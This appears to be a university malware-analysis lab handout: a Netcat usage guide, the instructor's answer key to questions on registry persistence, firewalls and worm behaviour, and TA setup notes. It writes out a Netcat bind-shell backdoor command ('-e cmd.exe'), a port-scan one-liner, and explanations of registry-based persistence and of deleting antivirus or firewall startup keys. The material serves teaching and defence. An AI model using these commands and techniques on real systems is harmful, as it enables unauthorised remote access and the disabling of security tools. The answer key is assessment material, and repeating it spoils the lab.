The last command will allow you to run Netcat without having to specify this directory.

Using NetcatThe executable program on both operating systems is called nc and the options are the same on both systems. To run Netcat in client mode so that it sends data across a network, use

#nc [IP Address to send to] [Port to send to](e.g. nc a.b.c.d 1234 - This sends data to port 1234 on machine a.b.c.d)

All input is through standard in, so whatever you type on the keyboard will be sent to the other machine. Alternatively, if you would like to read data from a file and pipe that through to the other machine, use

#nc [IP address to send to] [Port to send to] < [File to read from](e.g. nc a.b.c.d 1224 < testfile.txt - This sends the data in testfile.txt)

To stop Netcat, one simply has to press Ctrl+C. There are several different options that Netcat can be run with, depending on what it is being used for. The most common options are:

-l specifies that Netcat is running in listening mode-p specified which port Netcat should listen on-v verbose mode so that all results are displayed-w maximum amount of time (in clock ticks) to wait for a response-z specifies that Netcat should send very minimal data, usually a

synchronized packet to see if a response is obtained

-e Allows Netcat to execute a program to receive or generate network traffic

Look at the README files on both systems under the Netcat folder to find out more information about running Netcat. Many uses for netcat are found in the readme.

To run Netcat in listen mode, use the -l and -p options. The command syntax would be:#nc -l -p [port to listen to]

If you want to store the input that is received, you can pipe all the received data to a file, using the following command:

#nc -l -p [port to listen to] > [file to write to](e.g. nc -l -p 1224 > testfile.txt - whatever is received on port 1224 is written to

testfile.txt).NOTE: If you pipe everything to a file, whatever was previously in that file will be overwritten.

Netcat can also be used to scan ports using the following command (Netcat is being used in client mode for this):

#echo QUIT | nc -v -w [time to wait] -z [IP address to scan] [port range to scan](e.g. echo QUIT | nc -v -w 3 -z a.b.c.d 1-200 - This will scan ports 1 to 200 on the

system with IP address a.b.c.d)

Netcat can also be used to create backdoors on systems. Attackers can push a shell between systems over any TCP or UDP port. The shell will have the privileges of the user that executes Netcat in listener mode on the machine being exploited. For example, if you are on the Linux machine and would like to execute commands on the Windows machine, set up the Netcat listener on the Windows machine with the following command:

#nc -l –p [port to listen to] -e cmd.exe (e.g. nc -l -p 7777 -e cmd.exe This will pipe all input received at port 7777 to cmd.exe, which will then execute the commands. )

On the client side, simply type#nc [listening machine] [port to connect to](e.g. nc a.b.c.d 7777)

and start typing in your commands.

Jason Orlosky, Phillip Michael, Todd Lyon

Lab Solutions

Q1.1 List the keys you see in the registry including the key you just added. Be sure to show the names and data of each key.

A1.1 Keys: Data:

(default) (value not set)

CMDstarter “C:\WINDOWS\SYSTEM32\cmd.exe”

Other keys such as VMware may appear depending on what other programs have been installed. The above two are required.

Q1.2 Explain how the Infect.bat file infects the system so that the viral process “MrMalicious.exe” continues to be present even after it is deleted and the system is restarted. Use Appendix A and B as references if necessary.

The Infect.bat file adds a key to the registry to run the Infect.bat file at startup. This key has the name: ‘Process’ with data: "C:\WINDOWS\HiddenFolder\Infect.bat." The program then creates the correct directory matching the new key’s data. After it runs itself, it will copy the viral file from its own directory into the C:\Windows directory and run it after renaming it. This way, once the virus is deleted from the Windows directory, a user will think her or she has deleted the virus, when it is still actually on the system in an inactive folder. Searching for MrMalicious will not yield the hidden viral code.

Attachment # 1Create a batch file using the commands in Appendix A and B to remove the key in the following folder and add a new key with your Group## as the Name and no data. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet AudioFeel free to use existing batch files as a reference. Attach the code for this batch file to the end of your lab.

Correct Code:

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Audio /v group## exit

Slight variations of this code are acceptable but the student must have the reg add line.

Q1.3 How would someone remove solely the firewall key without knowing its title? Describe what a hacker’s software would have to do in order to prevent a specific program from starting up such as Norton Antivirus or ZoneAlarm Firewall. (Hint: The query command would be useful) A1.3 A hacker would have to write software that searches for a string in the registry key such as firewall or anti-virus. The software could use the query command recursively in the \Run hive to search data strings and names. After parsing the names and data, it could determine whether an antivirus or firewall key exists, and delete it.

Screenshot #1Search through the registry accesses and locate the malicious key. Highlight the key in the RegMon and take a screenshot. Include this with your lab for turn-in.

Screenshot #1 should look like the above

Screenshot #2Take a screenshot of the failed system and attach it to your lab report. On the screenshot, describe what happened upon reboot. Include this with your lab for turn-in.

The system will show a windows startup screen but then go black and continually stay black. The I/O disk light will blink constantly on the VMware screen and the Windows OS will never boot. Screenshot #2 should look like the attachment on the next page.

Note: A screenshot of the deleted software hive is also permissible.

Q2.4 Why is it that not many hackers have used the registry to disable operating systems?

Hackers generally try to accomplish a goal such as advertising for a company or setting up a money making scheme. Disabling a user’s operating system does nothing other than preventing users from accessing files. This type of attack could be crippling to a business where many monetary or governmental documents are stored.

Screenshot #3Take a screenshot of the Windows Security Alert asking if you want to keep blocking the nc program.

Q3.5 What does ethereal show transpired between the 7.2 and Windows XP machines? Why did this occur?

The 7.2 Machine is sending continous Syn’s, but because the Windows firewall is up all the packets are dropped.

Q3.6 What does this command show?

All open ports for both this user, and the machine.

Q3.7 What happens when you restart the Windows XP machine, and try to connect from the RedHat 7.2 machine with Netcat?

You are still able to gain administrator access.

Screenshot #4Take a screenshot of the the entry running server.exe highlighted in the registry

Q3.8 How can you detect malicious code such as the 8633 program running on your computer?

Using the task manager, and knowing what process’s are running on your computer and what they are. Also monitoring what ports are open, and making sure new ones are not randomly opened.

Q3.9 What should you do avoid having malicious code such as this installed on your machine in the first place?

Q 4.1 - What is the name of the virus process loaded in memory?Rnathchk.exe

Q 4.2 - Is this process running a server?Yes

Q 4.3 - If yes, What port is it listening on?36276 (Random Port)

Q 4.4 - What type of server does this appear to be?FTP

Q 4.5 - Do you receive a login prompt?Yes

S 4.1 - Take a screen capture of your ftp session.

Q 4.6 - What port number do you see a large number of connections to?445

Q 4.7 - Why do you think this is?The virus is trying to redistribute it’s self

Q 4.8 - What port are connections extablished to?25 & 48275

Q 4.9 - What is it connecting to these 2 different ports for?SMTP & IRC(BotNet)

Q 4.10 - What is the virus repeatively doing to the registry, and why do you think this is?

Reinstalls its self for startup

S 4.2 Take a screen capture of this

Q 4.11 - What is the name and path of the executable created once document.pif is executed?

C:\windows\system32Q 4.12 - There are 3 files created to replicate the virus on the hard drive where are they and what are there names?

C:\pic.src

C:\see_this!.pifC:\my_picture.scr

Q 4.13 - Why do you think the virus searches for files on the hard drive?To find e-mail address ( This question is hard and not obvious)

Q 4.14 - What port is it trying to connect to and why?Port 445 to redistribute its self

S 4.3 - Take a screen capture of this

Q 4.15 - What is an advantage of active logging over active monitoring?Logging you can view capture all events but active logging you can only view current events

Do not just run any program you receive, make sure it is from a trusted vendor. Also using a tool to monitor additions to the registry will help avoid malicious code such as this.

Lab instructions for TA

Create a virtual machine image of Windows XP with Service pack 2 and put on the NAS for this lab.

Also make sure the following files are available for download on the NAS server:

- Regmon.exe

- Jpfwall.exe

- Hiddenfolder - folder containing:- Infect.bat- RenameMe.exe

-Netcat

- ZSNES.zip

- installer.c

- server.c

- VCToolkitSetup

- dbg_x86_6.4.7.2

Make sure all other files included with the lab are copied to the Nas Server